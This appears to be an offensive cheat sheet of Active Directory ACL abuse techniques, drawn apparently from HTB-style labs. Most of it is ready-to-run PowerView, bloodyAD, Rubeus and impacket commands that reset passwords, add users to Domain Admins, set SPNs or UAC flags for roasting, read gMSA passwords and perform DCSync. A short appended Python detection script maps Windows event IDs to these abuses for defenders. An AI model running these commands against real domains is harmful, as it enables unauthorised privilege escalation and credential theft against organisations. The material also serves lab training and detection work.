Methods
- ForceChangePassword: abused with Set-DomainUserPassword
- AddMembers: abused with Add-DomainGroupMember
- GenericAll: abused with Set-DomainUserPassword or Add-DomainGroupMember
- GenericWrite: abused with Set-DomainObject
- WriteOwner: abused with Set-DomainObjectOwner
- WriteDACL: abused with Add-DomainObjectACL
- AllExtendedRights: abused with Set-DomainUserPassword or Add-DomainGroupMember
ACLs enumeration
#PowerShell cmdlets (manual mode, more evasive than PowerView)
PS C:\htb> Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt
#For every user, list the ACEs whose IdentityReference matches the principal of interest (here INLANEFREIGHT\wley; the regex needs the escaped backslash)
PS C:\htb> foreach($line in [System.IO.File]::ReadLines("C:\Users\htb-student\Desktop\ad_users.txt")) {Get-Acl "AD:\$(Get-ADUser $line)" | Select-Object Path -ExpandProperty Access | Where-Object {$_.IdentityReference -match 'INLANEFREIGHT\\wley'}}
#Performing a reverse search: mapping an ObjectType GUID value back to its extended right
PS C:\htb> $guid = "00299570-246d-11d0-a768-00aa006e0529"
PS C:\htb> Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * | Select Name,DisplayName,DistinguishedName,rightsGuid | ? {$_.rightsGuid -eq $guid} | fl
Enumerate ACLs for a specific user
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> $sid = Convert-NameToSid rita
PS C:\Tools> Get-DomainObjectAcl -ResolveGUIDs -Identity * -Domain inlanefreight.ad | ? {$_.SecurityIdentifier -eq $sid}
Abuse Foreign Groups
As a rule, try to identify users that belong to foreign groups, then check that group's permissions and its nested group memberships. This may lead to lateral movement into the parent domain.
Example 1:
User Intrusionz3r0 belongs to the foreign group "foreingn_admins", which in turn is a member of the Account Operators group on the parent domain controller. As a result, Intrusionz3r0 can create a user in the parent domain and add it to powerful groups (e.g. DNSAdmins).
Tools
Enumerate Foreign Users
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Get-DomainForeignUser
Find Foreign ACLs across all users within the domain
$Domain = "domain.local"
$DomainSid = Get-DomainSid $Domain
#Keep only allow ACEs granting write-class rights to non-built-in principals (RID >= 1000) from outside this domain
Get-DomainObjectAcl -Domain $Domain -ResolveGUIDs -Identity * | ? {
($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner') -and `
($_.AceType -match 'AccessAllowed') -and `
($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and `
($_.SecurityIdentifier -notmatch $DomainSid)
}
Abusing Foreign Security Principals & ACLs
#Enumerate Foreign Security Principals
PS C:\Tools> Get-DomainObject -LDAPFilter '(objectclass=ForeignSecurityPrincipal)' -Domain logistics.ad
#Enumerate group members that come from a foreign domain
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Get-DomainForeignGroupMember -Domain logistics.ad
Convert SID to name and vice versa
#Convert SID to name
PS C:\Tools> ConvertFrom-SID S-1-5-21-2432454459-173448545-3375717855-3601
#Convert name to SID
PS C:\Tools> ConvertTo-SID Intrusionz3r0
Need Credentials?
$SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force;
$Cred = New-Object System.Management.Automation.PSCredential('HTB\svc-alfresco', $SecPassword);
GenericAll Rights on User
Set-DomainObject -Credential $Cred -Identity <username> -Set @{serviceprincipalname="fake/NOTHING"}
#Kerberoastable: the account now has an SPN, so its TGS can be requested and cracked offline
.\Rubeus.exe kerberoast /user:<username> /nowrap
impacket-GetUserSPNs megacorp.local/sbauer:'D3veL0pM3nT!' -request
#No pre-authentication: XOR the DONT_REQ_PREAUTH flag (0x400000 = 4194304) into userAccountControl, making the account AS-REP roastable
Set-DomainObject -Identity <username> -XOR @{UserAccountControl=4194304}
GenericAll Rights on Group
net group "domain admins" <username> /add /domain
Add-ADGroupMember -Identity "domain admins" -Members <username>
bloodyAD -u Thomas.Powell -p 'Password123!' --dc-ip 10.10.65.121 add groupMember 'admsvc' 'Thomas.Powell'
GenericWrite on Computer
- Shadow credentials (msDS-KeyCredentialLink; Windows Server 2016 or later)
- Resource-Based Constrained Delegation (Windows Server 2012 onwards)
- unicodePwd, to change the machine password:
❯ bloodyAD -u 'FS01$' -p 'password123' -d retro2.vl --dc-ip 10.10.120.69 set password 'ADMWS01$' 'Password123'
[+] Password changed successfully!
GenericWrite on User
Targeted Kerberoasting (the account's password must be weak enough to be cracked)
❯ python3 targetedKerberoast.py -d delegate.vl -u A.Briggs -p 'P4ssw0rd1#123' --request-user 'N.Thompson'
WriteOwner Rights on User
PS C:\> Set-DomainObjectOwner -Identity claire -OwnerIdentity Tom -Verbose
PS C:\> Add-DomainObjectAcl -TargetIdentity Claire -PrincipalIdentity Tom -Rights ResetPassword -Verbose
PS C:\> Set-DomainUserPassword -Identity Claire -AccountPassword (ConvertTo-SecureString 'Password1!' -AsPlainText -Force) -Verbose
WriteDACL Rights on Group
Add-DomainObjectAcl -TargetIdentity Backup_Admins -PrincipalIdentity claire -Rights All -Verbose
Add-ADGroupMember -Identity "Backup_Admins" -Members claire -Verbose
ForceChangePassword on User
Set-DomainUserPassword -Identity delegate -AccountPassword (ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
rpcclient -U KnownUsername 10.10.10.192
> setuserinfo2 UsernameChange 23 'ComplexP4ssw0rd!'
[DCSync] DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the Domain Controller
impacket-secretsdump svc_loanmgr:'Moneymakestheworldgoround!'@10.10.10.175 -just-dc-user Administrator
ReadGMSAPassword
bloodyAD --host 192.168.210.15 -d domain.local -u 'COMPUTERNAME$' -p :24039a7fd44d8decdxxxxxxxc06 get object 'TARGET' --attr msDS-ManagedPassword
gMSADumper.py -u 'user' -p 'password' -d 'domain.local'
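Defensive counterpart, added here as an example that is not part of the original notes: a small Python triage script that maps Windows Security events (IDs 4724, 4728 and 5136) back to the abuse primitives listed above, so a blue team can spot an owner/DACL rewrite, SPN write, UAC change, RBCD or shadow-credential write, password reset or group addition. The sample events, the allowlisted service account and the DNs are constructed; field names follow the Security log's event data.

```python
import json

# Event IDs are the standard Windows Security log IDs; the attribute-to-primitive
# mapping is this script's own detection hypothesis, not a log field.
EVENT_MEANING = {
    4724: "password reset attempt (ForceChangePassword / GenericAll on user)",
    4728: "member added to global security group (AddMembers / GenericAll on group)",
}
# 5136 "directory service object was modified": attributes that matter here.
ATTR_MEANING = {
    "ntsecuritydescriptor": "DACL/owner rewritten (WriteDACL / WriteOwner)",
    "serviceprincipalname": "SPN written (targeted Kerberoast via GenericWrite)",
    "useraccountcontrol": "UAC flags written (check DONT_REQ_PREAUTH 0x400000)",
    "msds-allowedtoactonbehalfofotheridentity": "RBCD configured (GenericWrite on computer)",
    "msds-keycredentiallink": "key credential added (GenericWrite on computer)",
}
# Accounts whose changes are expected (assumed; a real deployment baselines this).
ALLOWLIST = {"svc_identitysync"}

def triage(event: dict):
    """Return an alert dict for one event, or None if it is not interesting."""
    eid = event.get("EventID")
    who = event.get("SubjectUserName", "")
    if who in ALLOWLIST:
        return None
    if eid in EVENT_MEANING:
        return {"actor": who, "target": event.get("TargetUserName"), "why": EVENT_MEANING[eid]}
    if eid == 5136:
        attr = event.get("AttributeLDAPDisplayName", "").lower()
        if attr in ATTR_MEANING:
            return {"actor": who, "target": event.get("ObjectDN"), "why": ATTR_MEANING[attr]}
    return None

def detect(raw_lines):
    """Parse one JSON event per line (SIEM-style export) and return the alerts."""
    return [a for a in (triage(json.loads(l)) for l in raw_lines if l.strip()) if a]

# Constructed sample events: the WriteOwner -> WriteDACL -> group-add chain from above.
SAMPLE_EVENTS = """
{"EventID": 4724, "SubjectUserName": "tom", "TargetUserName": "claire"}
{"EventID": 5136, "SubjectUserName": "claire", "ObjectDN": "CN=Backup_Admins,CN=Users,DC=example,DC=local", "AttributeLDAPDisplayName": "nTSecurityDescriptor"}
{"EventID": 4728, "SubjectUserName": "claire", "MemberName": "CN=claire,CN=Users,DC=example,DC=local", "TargetUserName": "Backup_Admins"}
{"EventID": 5136, "SubjectUserName": "svc_identitysync", "ObjectDN": "CN=bob,CN=Users,DC=example,DC=local", "AttributeLDAPDisplayName": "servicePrincipalName"}
{"EventID": 4624, "SubjectUserName": "alice"}
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS.splitlines()):
        print(alert)
```

Auditing of 5136 requires the "Directory Service Changes" subcategory and a SACL on the objects of interest; without those the attribute writes never reach the log.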
References